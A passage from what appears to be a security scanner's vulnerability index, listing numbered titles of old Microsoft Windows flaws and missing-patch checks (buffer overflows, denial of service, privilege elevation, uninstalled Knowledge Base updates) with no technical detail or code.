Base Article 917283 update is not installed [26861] Microsoft Windows Knowledge Base Article 918439 update is not installed [26836] Microsoft Windows RPC mutual authentication spoofing [26834] Microsoft Windows TCP/IP protocol driver buffer overflow [26830] Microsoft Windows SMB invalid handle denial of service [26823] Microsoft Windows DHCP Client buffer overflow [26820] Microsoft Windows SMB Server service information disclosure [26818] Microsoft Windows Mailslot Server driver buffer overflow [26815] Microsoft Windows Graphics Rendering Engine (GRE) WMF code execution [26814] Microsoft Windows RRAS RASMAN buffer overflow [26813] Microsoft Windows Knowledge Base Article 916768 update is not installed [26812] Microsoft Windows RRAS buffer overflow [26809] Microsoft Windows ART image rendering library buffer overflow [26805] Microsoft Windows JScript code execution [26788] Microsoft Windows Media Player PNG buffer overflow [26487] Microsoft Windows NTDLL.DLL improper DOS to NT path conversion [26166] Microsoft Windows Knowledge Base Article 912442 update is not installed [26161] Microsoft Windows Knowledge Base Article 916803 update is not installed [26156] Microsoft Windows Knowledge Base Article 913580 update is not installed [25794] Microsoft Windows Knowledge Base Article 917627 update is not installed [25792] Microsoft Windows Knowledge Base Article 911567 update is not installed [25629] Microsoft Windows Knowledge Base Article 912812 update is not installed [25626] Microsoft Windows Knowledge Base Article 911562 update is not installed [25625] Microsoft Windows Knowledge Base Article 908531 not installed [25598] Microsoft Windows XP Firewall .exe firewall bypass [25597] Microsoft Windows XP Firewall ADS filename:stream syntax application alert bypass [25573] Microsoft Windows winhlp32.exe .hlp embedded image buffer overflow [25554] Microsoft Windows Explorer COM object code execution [25535] Microsoft Outlook Express Windows Address Book file buffer overflow [25370] Microsoft Windows Knowledge Base Article 901190 not installed [25369] Microsoft Windows DNS recursive query denial of service [25366] Microsoft Windows Knowledge Base Article 905755 update is not installed [25365] Microsoft Windows Knowledge Base Article 914798 update is not installed [25364] Microsoft Windows Knowledge Base Article 914451 update is not installed [25363] Microsoft Windows Knowledge Base Article 905756 update is not installed [25361] Microsoft Windows Knowledge Base Article 905758 update is not installed [25360] Microsoft Windows Knowledge Base Article 905754 update is not installed [25359] Microsoft Windows Knowledge Base Article 905555 update is not installed [25358] Microsoft Windows Knowledge Base Article 905646 update is not installed [25357] Microsoft Windows Knowledge Base Article 905757 update is not installed [25342] Microsoft Windows Knowledge Base Article 905553 update is not installed [25261] Microsoft Windows Knowledge Base Article 913433 is not installed [24586] Microsoft Windows DNS client ATMA data record buffer overflow [24512] Microsoft Windows Knowledge Base Article 911565 update is not installed [24511] Microsoft Windows Knowledge Base Article 911564 update is not installed [24509] Microsoft Windows Knowledge Base Article 889167 update is not installed [24496] Microsoft Windows Knowledge Base Article 911927 update is not installed [24495] Microsoft Windows Knowledge Base Article 913446 update is not installed [24494] Microsoft Windows Knowledge Base Article 910620 update is not installed [24493] Microsoft Windows Media Player Plugin EMBED element buffer overflow [24492] Microsoft Windows and Office Korean IME privilege elevation [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [24489] Microsoft Windows IGMP v3 denial of service [24488] Microsoft Windows Media Player BMP image parsing service buffer overflow [24474] Microsoft Windows 2000 LDAP client accepts untrusted CA [24473] Microsoft Windows 2000 event ID 565 not logged [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [24471] Microsoft Windows VDM information disclosure [24463] Microsoft Windows XP &quot [24407] Microsoft Windows 2000 SECEDIT command fails to set ACLs correctly [24405] Microsoft Windows 2000 UPN credentials with trailing dot group policy bypass [24403] Microsoft Windows 2000 WideCharToMultiByte() incorrect Japanese character conversion [24402] Microsoft Windows 2000 Terminal Service client IP not logged [24400] Microsoft Windows 2000 domain authentication can be bypassed by a local administrator [24157] Microsoft Windows wireless ad-hoc network unauthorized access [24044] Microsoft Windows GRE ExtCreateRegion() and ExtEscape() WMF denial of service [23978] Microsoft Windows Knowledge Base Article 912919 update is not installed [23926] Microsoft Windows Knowledge Base Article 908523 update is not installed [23924] Microsoft Windows Knowledge Base Article 908519 update is not installed [23922] Microsoft Windows embedded Open Type Web font buffer overflow [23846] Microsoft Windows GDI32.DLL WMF image rendering code execution [23453] Microsoft Windows COM object as ActiveX control allows execution of code [23450] Microsoft Windows Knowledge Base Article 905915 update is not installed [23447] Microsoft Windows APC queue list could allow elevated privileges [23284] Microsoft Windows SynAttackProtect denial of service [23066] Microsoft Windows XP and 2000 Server MSRPC memory allocation denial of service [22899] Microsoft Windows Knowledge Base Article 902412 update is not installed [22882] Microsoft Windows Knowledge Base Article 896424 update is not installed [22877] Microsoft Windows Metafile image format buffer overflow [22876] Microsoft Windows Metafile and Enhance Metafile buffer overflow [22524] Microsoft Windows XP Wireless Zero Configuration service information disclosure [22514] Microsoft Windows Knowledge Base Article 902400 update is not installed [22512] Microsoft Windows Knowledge Base Article 907245 update is not installed [22502] Microsoft Windows Knowledge Base Article 905749 update is not installed [22501] Microsoft Windows Knowledge Base Article 900725 update is not installed [22498] Microsoft Windows XP tftp.exe heap overflow [22495] Microsoft Windows Collaboration Data Objects buffer overflow [22492] Microsoft Windows Knowledge Base Article 904706 update is not installed [22481] Microsoft Windows MSRPC Plug and Play buffer overflow [22480] Microsoft Windows DirectShow .AVI file code execution [22479] Microsoft Windows HTML in preview fields execute code [22478] Microsoft Windows .lnk properties execute code [22477] Microsoft Windows .lnk file execute code [22476] Microsoft Windows Distributed Transaction Coordinator message denial of service [22475] Microsoft Windows Distributed Transaction Coordinator TIP denial of service [22473] Microsoft Windows COM code execution [22204] Microsoft Windows keybd_event or SendKeys allows elevated privileges [22156] Microsoft Windows Knowledge Base Article 899589 update is not installed [22089] Microsoft Windows Registry Editor Utility concealment [21980] Microsoft Windows Registry Editor Utility concealment [21978] Microsoft Windows user32.dll component denial of service [21954] Microsoft Windows Remote Desktop Protocol mstlsapi.dll Man-in-the-Middle [21931] Microsoft Windows XP memory leak [21895] Microsoft Windows Msdds.dll object command execution [21704] Microsoft Windows Knowledge Base Article 896727 update is not installed [21700] Microsoft Windows Client Service for NetWare code execution [21626] Microsoft Windows PKINIT protocol obtain information [21625] Microsoft Windows kerberos message denial of service [21605] Microsoft Windows Knowledge Base Article 896423 update is not installed [21604] Microsoft Windows print spooler buffer overflow [21603] Microsoft Windows Knowledge Base Article 899588 update is not installed [21602] Microsoft Windows Plug and Play buffer overflow [21601] Microsoft Windows Knowledge Base Article 899591 update is not installed [21600] Microsoft Windows Knowledge Base Article 893756 update is not installed [21599] Microsoft Windows telephony service buffer overflow [21539] Microsoft Windows USB device driver buffer overflow [21407] Microsoft Windows RDP request denial of service [21355] Microsoft Windows Network Connection Manager denial of service [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [21272] Microsoft Windows Knowledge Base Article 903672 update is not installed [21269] Microsoft Windows Knowledge Base Article 901214 update is not installed [21221] Microsoft Windows Color Management Module buffer overflow [21214] Microsoft Windows NTFS allows attacker to obtain information [20829] Microsoft Windows Step-by-Step Interactive Training bookmark link file buffer overflow [20826] Microsoft Windows Knowledge Base Article 896422 update is not installed [20825] Microsoft Windows Knowledge Base Article 896358 update is not installed [20823] Microsoft Windows Knowledge Base Article 890169 update is not installed [20822] Microsoft Windows Knowledge Base Article 883939 update is not installed [20821] Microsoft Windows compiled Help (.CHM) integer overflow [20820] Microsoft Windows Knowledge Base Article 896426 update is not installed [20818] Microsoft Windows WebClient Service buffer overflow [20815] Microsoft Windows SMB process gain access [20629] Multiple Microsoft Windows IPv6 LAND denial of service [20546] Microsoft Windows Media Player allows creation of malicious media files [20382] Microsoft Windows Knowledge Base Article 894320 update is not installed [20380] Microsoft Windows Web View command execution [20318] Microsoft Windows Knowledge Base Article 893086 update is not installed [20317] Microsoft Windows Knowledge Base Article 890923 update is not installed [20000] Microsoft Windows Knowledge Base Article 892944 update is not installed [19969] Multiple Microsoft Windows Server 2003 Edition printer driver denial of service [19965] Multiple Microsoft Windows Server 2003 Editions SMB redirector denial of service [19843] Microsoft Windows Knowledge Base Article 894549 update is not installed [19836] Microsoft Windows CSRSS gain control [19835] Microsoft Windows HTML Application Host command execution [19834] Microsoft Windows object buffer overflow [19832] Microsoft Windows access requests gain privileges [19830] Microsoft Windows font buffer overflow [19829] Microsoft Windows Message Queuing component buffer overflow [19819] Microsoft Windows Remote Desktop &quot [19727] Microsoft Windows 2000 GDI32.DLL denial of service [19593] Microsoft Windows LAND denial of service [19288] IBM DB2 running on Microsoft Windows obtain information [19270] Microsoft Windows PNG image buffer overflow [19220] Microsoft Windows registry key connection denial of service [19110] Microsoft Windows Hyperlink Object Library code execution [19109] Microsoft Windows OLE code execution [19105] Microsoft Windows COM files gain privileges [19103] Multiple Microsoft Windows TCP/IP denial of service [19101] Microsoft Windows Servers License Logging service code execution [19096] Microsoft Windows Media Player PNG buffer overflow [19093] Microsoft Windows named pipe information disclosure [19091] Microsoft Windows SharePoint Services and SharePoint Team Services cross-site scripting [19089] Microsoft Windows SMB code execution [18879] Microsoft Windows USER32.DLL ANI header overflow [18768] Microsoft Windows Knowledge Base Article 891711 update is not installed [18766] Microsoft Windows Knowledge Base Article 871250 update is not installed [18758] Microsoft Windows Indexing Service allows code execution [18678] Microsoft Windows winhlp32.exe buffer overflow [18668] Microsoft Windows LoadImage API buffer overflow [18667] Microsoft Windows ANI file zero rate number overflow denial of service [18587] Microsoft Windows Media Player ActiveX object reveals existence of files [18576] Microsoft Windows Media Player mp3 code execution [18507] Microsoft Windows XP SP2 subnet option allows access to firewall exceptions [18394] Microsoft Windows Knowledge Base Article 870763 update is not installed [18393] Microsoft Windows Knowledge Base Article 873339 update is not installed [18392] Microsoft Windows Knowledge Base Article 885249 update is not installed [18391] Microsoft Windows Knowledge Base Article 885835 update is not installed [18390] Microsoft Windows Knowledge Base Article 885836 update is not installed [18378] Microsoft Windows Icon image anomaly detected [18342] Microsoft Windows NT DHCP HardwareAddress code execution [18341] Microsoft Windows NT DHCP MachineName denial of service [18340] Microsoft Windows LSASS gain privileges [18339] Microsoft Windows kernel LPC interface gain privileges [18338] Microsoft Windows Word for Windows 6.0 Converter font code execution [18337] Microsoft Windows Word for Windows 6.0 Converter table code execution [18336] Microsoft Windows HyperTerminal session file buffer overflow [18314] Microsoft Windows Knowledge Base Article 889293 update is not installed [18208] Microsoft Windows logon screen saver allows elevated privileges [17864] Microsoft Windows XP Explorer WAV file denial of service [17711] Microsoft Windows XP SP2 sessmgr.exe firewall bypass [17663] Microsoft Windows MS04-029 patch is not installed [17662] Microsoft Windows MS04-037 patch is not installed [17661] Microsoft Windows MS04-036 patch is not installed [17660] Microsoft Windows MS04-035 patch is not installed [17659] Microsoft Windows MS04-034 patch is not installed [17658] Microsoft Windows MS04-032 patch is not installed [17657] Microsoft Windows NetDDE MS04-031 patch is not installed [17646] Microsoft Windows RPC Runtime Library obtain information [17641] Microsoft Windows NNTP buffer overflow [17624] Microsoft Windows XP and Windows Server 2003 Compressed Folders buffer overflow [17621] Microsoft Windows 2003 SMTP service code execution [17560] Microsoft Windows 2000 and XP GDI library denial of service [17521] Microsoft Windows 2000 Service Pack 4 is not installed [17458] Microsoft Windows CE KDataStruct information disclosure [17457] Microsoft Windows XP Explorer.exe TIFF denial of service [17455] Microsoft Windows XP information disclosure [17412] IBM with Microsoft Windows XP Professional has default administrator account [17341] Microsoft Windows MS04-028 patch is not installed [17052] Microsoft Windows XP and Internet Explorer displays improper file icon [17051] Microsoft Windows XP Content-Location bypass Local Computer zone restrictions [17023] Microsoft Windows XP Windows Explorer bypass Zone Identifier (ZoneID) feature [17009] Microsoft Windows XP ICF bypass filter [17004] Microsoft Windows XP Service Pack 2 is not installed on the system [16913] Microsoft Windows 2003 users with Synchronize directory service data privilege [16912] Microsoft Windows 2003 groups with Synchronize directory service data privilege [16909] Microsoft Windows 2003 groups with Remove computer from docking station privilege [16907] Microsoft Windows 2003 users with Create global objects privilege [16905] Microsoft Windows 2003 users or groups with Create global objects privilege [16851] Microsoft Windows 2003 and XP WinKey and U key denial of service [16704] Microsoft Windows 2000 Media Player control code execution [16664] Microsoft Windows Program Group Converter buffer overflow [16627] Microsoft Windows System32 write file to the directory has been detected [16597] Microsoft Windows Windows Shell allows code execution [16592] Microsoft Windows Utility Manager gain privileges [16591] Microsoft Windows Task Scheduler buffer overflow [16590] Microsoft Windows POSIX buffer overflow allows local attacker to gain privileges [16587] Microsoft Windows Network Dynamic Data Exchange Running [16586] Microsoft Windows HTML Help could allow execution of code [16582] Microsoft Windows Server 2003 kernel CPU denial of service [16581] Microsoft Windows Enhanced Metafile (EMF) buffer overflow [16580] Microsoft Windows Virtual DOS Machine (VDM) allows elevated privileges [16579] Microsoft Windows Window Management API allows elevated privileges [16572] Microsoft Windows 2003 Users with Impersonate a client after authentication privilege [16570] Microsoft Windows 2003 Users with Create global objects privilege [16564] Microsoft Windows 2003 Groups with Create global objects privilege [16562] Microsoft Windows 2003 Groups with &quot [16556] Microsoft Windows NetDDE buffer overflow [16522] Microsoft Windows 2003 Impersonate a client after authentication privilege [16521] Microsoft Windows 2003 Deny Logon Through Terminal Services privilege [16520] Microsoft Windows 2003 Create global objects privilege [16362] Microsoft Windows XP Help Center and Support starts automatically [16304] Microsoft Windows JPEG buffer overflow [16276] Microsoft Windows 2000 Advanced Server fully qualified domain name security bypass [16270] Microsoft Windows IPSec filter bypass [16213] Microsoft Windows Local Security Authority buffer overflow exploit attempt detected [16211] Microsoft Windows Service Host buffer overflow exploit attempt detected [16210] Microsoft Windows Service Host buffer overflow exploit attempt detected [16208] Microsoft Windows RPC Locator Service buffer overflow exploit attempt detected [16207] Microsoft Windows kernel buffer overflow exploit attempt detected [16206] Microsoft Windows Command Shell buffer overflow exploit attempt detected [16171] Microsoft Windows XP Explorer code execution [16154] Microsoft Windows NT 4.0 TSE Security Patch denial of service [16095] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15956] Microsoft Windows long file share name buffer overflow [15818] Microsoft Windows MS04-011 patch is not installed [15813] Microsoft Windows MS04-014 patch is not installed [15811] Microsoft Windows MS04-012 patch is not installed [15715] Microsoft Windows Negotiate Security Software Provider buffer overflow [15714] Microsoft Windows Virtual DOS Machine allows elevated privileges [15713] Microsoft Windows ASN.1 double-free [15711] Microsoft Windows object identifier could be used to open network ports [15710] Microsoft Windows H.323 buffer overflow [15709] Microsoft Windows COM Internet Service and RPC over HTTP denial of service [15708] Microsoft Windows RPCSS Service RPC message can cause denial of service [15707] Microsoft Windows Local Descriptor Table allows privilege escalation [15704] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15702] Microsoft Windows winlogon buffer overflow [15700] Microsoft Windows 2000 Domain Controller LSASS LDAP message denial of service [15699] Microsoft Windows LSASS buffer overflow [15678] Microsoft Windows XP task creation allows privilege escalation [15632] Microsoft Windows 2000 Utility Manger allows privilege escalation [15589] Microsoft Windows allows elevated privileges [15507] Microsoft Windows XP Explorer wmf denial of service [15461] Microsoft Windows MS04-008 patch is not installed [15394] Microsoft Windows service running under non-built-in accounts has been detected [15284] Microsoft Windows XP Windows shell shimgvw.dll buffer overflow [15263] Microsoft Windows XP and 2000 Server kernel allows elevated privileges [15256] Microsoft Windows ASN.1 buffer overflow packet using NTLM has been detected [15255] Microsoft Windows ASN.1 buffer overflow packet using SMTP has been detected [15223] Microsoft Windows access violation or exception code has been detected [15218] Microsoft Windows command shell backdoor [15101] Microsoft Windows XP helpctr.exe cross-site scripting [15057] Microsoft Windows XP and Windows Server 2003 smbmount Linux client denial of service [15039] Microsoft Windows ASN.1 Library buffer overflow [15038] Microsoft Windows 2000 Server Windows Media Services denial of service [15037] Microsoft Windows Server 2003 WINS /GS flag denial of service [14924] Microsoft Windows XP folder containing HTML code and executable file code execution [13786] Microsoft Windows MS03-051 patch is not installed [13785] Microsoft Windows MS03-048 patch is not installed [13784] Microsoft Windows MS03-050 patch is not installed [13639] Microsoft Windows Workstation buffer overflow [13638] Microsoft Windows MS03-049 patch is not installed [13558] Microsoft Windows XP CommCtl32.dll could allow an attacker to execute code [13509] Microsoft Windows HTML Help could allow an attacker to gain privileges [13482] Microsoft Windows MS03-047 patch is not installed [13480] Microsoft Windows MS03-046 patch is not installed [13478] Microsoft Windows MS03-044 patch is not installed [13473] Microsoft Windows MS03-045 patch is not installed [13472] Microsoft Windows MS03-042 patch is not installed [13471] Microsoft Windows MS03-041 patch is not installed [13444] Microsoft Windows Non-English patched with MS03-045 denial of service in Sophos Anti-Virus [13426] Microsoft Windows 2000 and XP RPC race condition [13424] Microsoft Windows User32.dll ListBox and ComboBox controls buffer overflow [13423] Microsoft Windows 2000 Local Troubleshooter ActiveX control buffer overflow [13422] Microsoft Windows Authenticode could allow an attacker to execute code [13420] Microsoft Windows HSC HCP protocol file buffer overflow [13413] Microsoft Windows Messenger Service popup buffer overflow [13412] Microsoft Windows MS03-043 patch is not installed [13407] Microsoft Windows 2000 Server mqsvc.exe MQLocateBegin packet buffer overflow [13385] Microsoft Windows Server 2003 &quot [13375] Microsoft Windows Media Player Dynamic HTML behaviors allows an attacker to execute code [13364] Microsoft Windows MS03-040 patch is not installed [13344] Microsoft Windows 98 flood of fragmented UDP packets causes denial of service [13342] Microsoft Windows PostThreadMessage API allows processes to be terminated without permission [13211] Microsoft Windows 2000 and XP URG memory leak [13183] Microsoft Windows service pack detected [13171] Microsoft Windows Server 2003 can allow attacker to bypass mechanism used to detect buffer overflows [13134] Microsoft Windows MS03-039 patch is not installed [13131] Microsoft Windows 2000 Message Queue Manager buffer overflow [13129] Microsoft Windows RPCSS DCOM buffer overflows [13105] Microsoft Windows Update fails to notify users of updates when host-blocking is used [13095] Microsoft Windows auto update is disabled [13089] Microsoft Windows NetBIOS Name Service information disclosure [12903] Microsoft Windows command shell banner [12835] Microsoft Windows Pocket PC could allow an attacker to gain access [12762] Microsoft Windows NT 4.0 Q823803i patch RRAS denial of service [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [12724] Microsoft Windows Media Player ASF file could allow code execution [12701] Microsoft Windows NT 4.0 Server file management function denial of service [12679] Microsoft Windows RPC DCOM denial of service [12652] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension POST request buffer overflow [12620] Microsoft Windows 2000 Server SMTP FILETIME denial of service [12544] Microsoft Windows Servers SMB packet buffer overflow [12543] Microsoft Windows 2000 Accessibility Utility Manager could allow an attacker to gain privileges [12533] Microsoft Windows MS03-010 patch is not installed [12521] Microsoft Windows Rundll32.exe overly long routine name buffer overflow [12493] Microsoft Windows Shell32.dll 2000 ShellExecute function buffer overflow [12489] Microsoft Windows 2000 Server Active Directory buffer overflow [12442] Microsoft Windows XP SP1 Windows shell desktop.ini buffer overflow [12440] Microsoft Windows Media Player ActiveX control could disclose sensitive information [12187] Microsoft Windows XP gethostbyaddr() denial of service [12128] Microsoft Windows 2000 and Windows NT MS03-019 patch is not installed [12092] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension buffer overflow [12048] Microsoft Windows 2000 and Windows Server 2003 LAN Manager hash creation enabled [11953] Microsoft Windows Media Player skin downloading could allow an attacker to execute code [11824] Microsoft Windows XP Service Control Manager (SCM) race condition [11822] Microsoft Windows regedit.exe command execution [11816] Microsoft Windows 2000 Terminal Services MSGINA.DLL insecure access permissions [11810] Microsoft Windows win2k.sys EngTextOut denial of service [11803] Microsoft Windows kernel LpcRequestWaitReplyPort() buffer overflow [11696] Microsoft Windows 2000 Terminal Services man-in-the-middle attack [11617] Microsoft Windows 2000 MS03-007 patch is not installed on the system [11575] Microsoft Windows Script Engine buffer overflow [11546] Microsoft Windows 2000 Windows Help Facility .cnt file buffer overflow [11536] Microsoft Windows PostMessage() API function could disclose password [11505] Microsoft Windows XP Safe Mode bypass [11425] Microsoft Windows Me HSC hcp:// buffer overflow [11344] Microsoft Windows riched20.dll attribute label buffer overflow [11329] Microsoft Windows NT and 2000 cmd.exe CD path name buffer overflow [11274] Microsoft Windows 2000 NetBIOS continuation packets denial of service [11273] Microsoft Windows 2000 RPC service could allow an attacker to gain elevated privileges [11260] Microsoft Windows XP Windows Redirector buffer overflow [11216] Microsoft Windows NT and 2000 command prompt denial of service [11141] Microsoft Windows 2000 Terminal Services MSGINA.DLL denial of service [11132] Microsoft Windows Locator service buffer overflow [11030] Microsoft Windows OpenType font (.otf) fontview denial of service [10958] Microsoft Windows File Protection certificate chains with a trusted root CA are accepted [10957] Microsoft Windows File Protection fails to remove old security catalog .CAT files [10892] Microsoft Windows XP Shell media file buffer overflow [10843] Microsoft Windows 2000 and XP SMB signing group policy modification [10764] Microsoft Windows XP wireless LAN feature could leak information [10736] Microsoft Windows XP Fast User Switching could disclose user processes [10431] Microsoft Windows 2000 SNMP LANMAN Extension memory leak denial of service [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [10398] Microsoft Windows Media Player world-writable executables [10377] Microsoft Windows XP and 2000 administrative alerts fail when security event log is full [10343] Microsoft Windows NetDDE Agent can be used to gain elevated privileges [10279] Microsoft Windows XP &quot [10254] Microsoft Windows compiled HTML Help (.chm) files could be used to execute code [10253] Microsoft Windows HTML Help ActiveX buffer overflow [10252] Microsoft Windows zipped file decompression incorrect target path [10251] Microsoft Windows zipped file decompression buffer overflow [10215] Microsoft Windows Scripting Host is running on the system [10199] Microsoft Windows 2000/XP PPTP packet buffer overflow [10132] Microsoft Windows fails to properly check execute permissions for 16-bit executable files [10122] Microsoft Windows Remote Desktop Protocol could allow an attacker to monitor keystrokes [10121] Microsoft Windows Remote Desktop Protocol checksum information leak [10120] Microsoft Windows XP Remote Desktop malformed PDU Confirm Active packet denial of service [9982] Microsoft Windows Certificate Enrollment Control ActiveX control could be used to delete digital certificates [9971] Microsoft Windows Media Player .wmf file extension or content type spoofing [9953] Microsoft Windows Media Player WMD code execution [9946] Microsoft Windows 2000 Terminal Services session screensaver fails to lock the console [9933] Microsoft Windows NT/2000/XP SMB packet request buffer overflow [9878] Microsoft Windows XP Help and Support Center HCP:// URL could be used to delete files [9869] Microsoft Windows NTFS hard links could bypass event auditing logs [9856] Microsoft Windows 2000 NCM handler routine could allow elevated privileges [9779] Microsoft Windows 2000 weak system partition permissions [9752] Microsoft Windows 2000 Service Pack 3 is not installed [9746] Microsoft Windows 2000 HTML Help item parameter buffer overflow [9727] Microsoft Windows Media Player mplay32 long file name buffer overflow [9625] Microsoft Windows 2000 Narrator allows login information to be audible [9422] Microsoft Windows Media Player Active Playlist could allow local HTML script execution [9421] Microsoft Windows Media Player WMDM service invalid resource connection could allow elevated privileges [9420] Microsoft Windows Media Player cache path disclosure could allow remote execution of code [8918] Microsoft Windows XP Remote Desktop Access is enabled [8915] Microsoft Windows XP Internet Configuration Firewall is disabled [8892] Microsoft Windows XP &quot [8891] Microsoft Windows XP option to digitally sign server communications disabled [8890] Microsoft Windows XP option to digitally sign client communications when server agrees disabled [8889] Microsoft Windows XP option to digitally sign server communications when client agrees disabled [8888] Microsoft Windows XP security option to digitally sign client communications disabled [8882] Microsoft Windows XP Session security for NTLM SSP based servers is below minimum [8880] Microsoft Windows XP Session security for NTLM SSP based clients is below minimum [8867] Microsoft Windows 2000 LanMan denial of service [8813] Microsoft Windows 2000 Terminal Services allows attacker to bypass group policy settings [8759] Microsoft Windows 2000 could allow an attacker to block the application of Group Policy settings [8752] Microsoft Windows NT, 2000, and XP MUP buffer overflow [8739] Microsoft Windows 2000 DCOM memory leak [8728] Microsoft Windows Registry remote write audit [8727] Microsoft Windows Registry remote access audit [8621] Microsoft Internet Explorer on Windows Me fails to prompt user when a cookie is stored if set using JavaScript [8604] Microsoft Outlook allows an attacker to execute JavaScript code by using IFRAME tags to reference malicious Windows Media Player file [8559] Microsoft Windows registry security SAM read [8512] Microsoft Windows NT security ID lookup [8509] Microsoft Windows startup folder access [8462] Microsoft Windows NT/2000 debugging subsystem allows attacker to create duplicate handles [8402] Microsoft Windows 2000 allows an attacker to bypass password policy [8388] Microsoft Windows NT Server with IIS 4.0 could allow users to bypass &quot [8384] Microsoft Windows Shell buffer overflow can occur when an application has been improperly removed [8307] Microsoft Windows 2000, Windows XP, and Exchange 2000 SMTP data transfer command denial of service [8304] Microsoft Windows 2000 and Exchange 5.5 SMTP service unauthorized mail privileges [8231] Microsoft Windows NT SNMP OID decoding memory leak [8209] Microsoft Windows XP CIFS port denial of service [8207] Microsoft Windows XP UDP port denial of service [8199] Microsoft Windows 2000 Terminal Services unlocked client [8094] Microsoft Windows 2000 and Interix 2.2 Telnet protocol option buffer overflow [8077] Microsoft Windows Messenger and/or MSN Messenger is present on the system [8043] Microsoft Windows NT, 2000, and XP using NTFS could allow files to be hidden [8037] Microsoft Windows 2000 empty TCP packet denial of service [8023] Microsoft Windows NT and Windows 2000 SIDs could allow an attacker to gain elevated privileges in another domain [8000] Microsoft Windows XP &quot [7922] Microsoft Windows XP Pro Upgrade installation causes security patches for Internet Explorer to be rolled back [7892] Microsoft Windows 95 Backup long file extension buffer overflow [7800] Microsoft Internet Explorer Windows Media Player ActiveX could allow an attacker to determine the existence of files or directories [7732] Microsoft Windows XP Remote Desktop sends username in plain text [7731] Microsoft Windows XP fast user switching could lockout users except administrator [7722] Microsoft Windows XP, Me, 98, and 98SE UPnP spoofed UDP packet with SSDP announcement denial of service attack [7721] Microsoft Windows XP, Me, 98, and 98SE UPnP malformed NOTIFY directive buffer overflow [7713] Microsoft Windows XP allows attacker to execute programs using hotkeys without authentication [7709] Microsoft Windows multiple vendor Web browser high image count denial of service [7667] Microsoft Windows 2000 IKE UDP packet flood denial of service [7605] Microsoft Windows XP helpctr.exe buffer overflow [7542] Microsoft Windows 95 and 98 with multiple TCP/IP stacks ICMP packet denial of service [7538] Microsoft Windows 2000 and XP Terminal services allow an attacker to spoof IP addresses [7533] Microsoft Windows 2000 RunAs service denial of service [7532] Microsoft Windows 2000 RunAs service allows local attacker to bypass pipe authentication [7531] Microsoft Windows 2000 RunAs service reveals sensitive information [7528] Microsoft Windows NT and Windows 2000 malformed RPC request denial of service [7428] Microsoft Windows Me and XP UPnP denial of service [7422] Microsoft Windows NT RSHSVC does not properly validate users [7421] Microsoft Windows NT GetThreadContext/SetThreadContext denial of service [7409] Microsoft Windows 2000 and Windows XP GDI denial of service [7405] Microsoft Windows NT NonPagedPool denial of service [7403] Microsoft Windows NT Win32k.sys denial of service [7402] Microsoft Windows NT kernel mode handle-closing denial of service [7401] Microsoft Windows NT group policies not applied if long DC name [7400] Microsoft Windows NT user policies not updated [7398] Microsoft Windows NT symbolic link case elevation of privileges [7391] Microsoft Windows NT strong passwords may allow parts of the full name [7369] Microsoft Windows CSRSS.EXE denial of service [7329] Microsoft Windows NT WINS malformed packet flood denial of service [7318] Microsoft Windows ME SSDP service denial of service [7302] Microsoft Windows NT and 2000 Terminal Server malformed RDP packet series denial of service [7231] Microsoft Windows 95 using NetWare remote administration contains hidden share [7224] Microsoft Windows NT smbmount request from Linux client denial of service [7125] Microsoft Windows NT Index Server &quot [7107] Microsoft Windows NT Xenroll denial of service [7105] Microsoft Windows RPC endpoint mapper malformed request denial of service [7008] Microsoft Windows 2000 IrDA device denial of service [6977] Microsoft Windows NT and 2000 NNTP memory leak denial of service [6962] Microsoft Windows Media Player .ASF marker buffer overflow [6943] Microsoft Windows NT NT4ALL denial of service [6931] Microsoft Windows 2000 without Service Pack 2 [6924] Microsoft Windows 98 ARP packet flooding denial of service [6919] Microsoft Windows 2000 Task Manager does not terminate malicious files with the same name as a system process [6912] Microsoft Windows NT and 2000 Terminal Server RDP memory leak denial of service [6907] Microsoft Windows Media Player .NSC buffer overflow [6876] Microsoft Windows 2000 could allow an attacker to change network passwords [6874] Microsoft Windows 95/98 invalid path in registry could allow malicious file execution [6803] Microsoft Windows 2000 SMTP service allows mail relaying [6745] Microsoft Windows 2000 LDAP function could allow domain user password change [6669] Microsoft Windows 2000 Telnet system call denial of service [6668] Microsoft Windows 2000 Telnet handle leak denial of service [6667] Microsoft Windows 2000 Telnet multiple idle sessions denial of service [6666] Microsoft Windows 2000 Telnet username denial of service [6665] Microsoft Windows 2000 Telnet service weak domain authentication [6664] Microsoft Windows 2000 Telnet service predictable pipe names could allow elevation of privileges [6590] Microsoft Windows 2000 debug registers allow attacker to gain elevated privileges [6584] Microsoft Windows Media Player HTML code hidden in Internet shortcuts [6518] Microsoft Windows Index Server could allow attackers to view files on the Web server [6517] Microsoft Windows NT Index Server &quot [6506] Microsoft Windows 2000 Server Kerberos denial of service [6443] Microsoft Windows 2000 catalog file could remove installed hotfixes [6441] Microsoft Windows NT drivers DbgPrint function format string [6294] Microsoft Windows Me and Plus! 98 recovery of Compressed Folder passwords [6275] Microsoft Windows user.dmp file insecure permissions [6227] Microsoft Windows Media Player allows remote attackers to execute commands in Internet Explorer [6160] Microsoft Windows 2000 event viewer buffer overflow [6136] Microsoft Windows 2000 domain controller denial of service [6103] Microsoft Windows NT PPTP denial of service [6070] Microsoft Windows UDP socket denial of service [6062] Microsoft Windows DDE allows privilege elevation [6035] Microsoft Windows 2000 Server RDP denial of service [6006] Microsoft Windows NT mutex denial of service [5973] Microsoft Windows 2000 EFS allows local user to recover sensitive data [5937] Microsoft Windows Media Player skins can be used to execute arbitrary code [5936] Microsoft Windows 2000 Server Directory Service Restore Mode allows user to login with blank password [5800] Microsoft Windows 2000 Index Service ActiveX controls allow unauthorized access to file information [5746] Microsoft Windows NT MSTask.exe denial of service [5673] Microsoft Windows NT MTS registry permissions [5672] Microsoft Windows NT SNMP registry permissions [5671] Microsoft Windows NT RAS registry permissions [5623] Microsoft Windows NT and 2000 Phone Book service buffer overflow [5598] Microsoft Windows 2000 Telnet daemon could allow a denial of service [5585] Microsoft Windows 2000 brute force attack [5573] Microsoft Windows NT SynAttackProtect denial of service [5502] Microsoft Windows 2000 Indexing Services ixsso.query [5489] Microsoft Windows NT Terminal Server GINA 